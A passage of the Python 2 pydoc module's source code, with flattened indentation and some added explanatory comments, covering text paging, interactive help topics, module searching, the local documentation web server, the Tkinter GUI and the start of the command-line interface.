if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = int(os.environ.get('LINES', 25)) - 1  # LINES arrives as a string when set in the environment
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r          \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r          \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
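# The functions above form a fallback chain; pager() is the public entry point
# and picks a strategy once ($PAGER, less/more, or plain printing). Sketch:
#
#     import pydoc
#     pydoc.pager('\n'.join('line %d' % i for i in range(200)))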
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
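# Sample descriptions produced above (illustrative):
#
#     describe(sys)      # 'built-in module sys'
#     describe(len)      # 'built-in function len'
#     describe(str)      # 'class str'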
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
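# locate() resolves a dotted name by importing as far as it can and then
# walking attributes (illustrative sketch):
#
#     locate('os.path.join')                      # the join function
#     locate('json.decoder.JSONDecoder')          # a class inside a module
#     locate('os.path.no_such_attr') is None      # unknown attribute -> None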
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
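# This trio is the machinery behind interactive help: resolve() maps a name or
# object to (object, name), render_doc() formats it with `text`, doc() pages it.
# Illustrative sketch:
#
#     import pydoc
#     print pydoc.render_doc('glob.glob')     # the formatted text itself
#     pydoc.doc('json.dumps')                 # same idea, sent to the pager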
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
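# Batch HTML generation (illustrative sketch): writedoc() drops <name>.html in
# the current directory, writedocs() walks a directory tree of modules.
#
#     import pydoc
#     pydoc.writedoc('json')           # writes json.html
#     pydoc.writedocs('/tmp/mypkg')    # hypothetical path; one page per module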
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
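# This module-level Helper instance is what the interactive help() builtin ends
# up calling (site.py installs a thin wrapper around it). Typical requests:
#
#     help('modules')           # list importable modules
#     help('keywords')          # list Python keywords
#     help('LOOPING')           # a topic from Helper.topics
#     help(dict.setdefault)     # documentation for an object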
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = split(module.__doc__ or '', '\n')[0]  # split() never yields an empty list, unlike splitlines()
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
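# Keyword search (illustrative sketch): apropos() drives ModuleScanner with a
# callback that prints one line per matching module; `pydoc -k` uses this.
#
#     import pydoc
#     pydoc.apropos('http')     # prints e.g. 'httplib - HTTP and HTTPS ...'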
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
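# Serving documentation over HTTP (illustrative sketch): this is what
# `pydoc -p <port>` runs; callback fires once the server is ready and
# completer when it shuts down.
#
#     import pydoc
#     def ready(server): print 'serving at', server.url
#     pydoc.serve(8080, ready)      # KeyboardInterrupt (Ctrl-C) stops it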
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
